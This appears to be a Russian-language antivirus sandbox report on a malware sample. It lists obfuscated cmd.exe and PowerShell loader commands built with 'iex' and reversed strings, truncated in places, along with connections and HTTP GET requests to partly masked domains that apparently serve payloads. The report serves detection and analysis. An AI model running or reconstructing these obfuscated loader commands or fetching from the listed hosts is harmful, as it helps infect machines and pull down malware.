Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cMD /c"SeT FgWsL= iex( ( -jOiN[ReGEx]::Matches("))43]rAhc[]GnIRts[,'4Gv'(eCalper.)'$',)09]rAhc[+48]rAhc[+78]rAhc[((eCalper.)93]rAhc[]GnIRts[,)401]rAhc[+58]rAhc[+001]rAhc[((eCal...
Сетевая активность
Подключается к
- 'li###seum.kz':80
- 'li###seum.kz':443
- 'me#####archgroup.com':80
- 'co####reates.com':80
- 'ca###irley.com':80
- 'ca###irley.com':443
TCP
Запросы HTTP GET
- http://li###seum.kz/l6lbBW8pJ
- http://me#####archgroup.com/h2MpbvPu
- http://co####reates.com/hkaT0CiG
- http://www.ca###irley.com/lEGcINYm
Другие
- 'li###seum.kz':443
- 'ca###irley.com':443
UDP
- DNS ASK ak###kep.com
- DNS ASK li###seum.kz
- DNS ASK me#####archgroup.com
- DNS ASK co####reates.com
- DNS ASK ca###irley.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cMD /c"SeT FgWsL= iex( ( -jOiN[ReGEx]::Matches("))43]rAhc[]GnIRts[,'4Gv'(eCalper.)'$',)09]rAhc[+48]rAhc[+78]rAhc[((eCalper.)93]rAhc[]GnIRts[,)401]rAhc[+58]rAhc[+001]rAhc[((eCal...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c"SeT FgWsL= iex( ( -jOiN[ReGEx]::Matches("))43]rAhc[]GnIRts[,'4Gv'(eCalper.)'$',)09]rAhc[+48]rAhc[+78]rAhc[((eCalper.)93]rAhc[]GnIRts[,)401]rAhc[+58]rAhc[+001]rAhc[((eCalper.)421]rAhc[]GnIR...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invo...
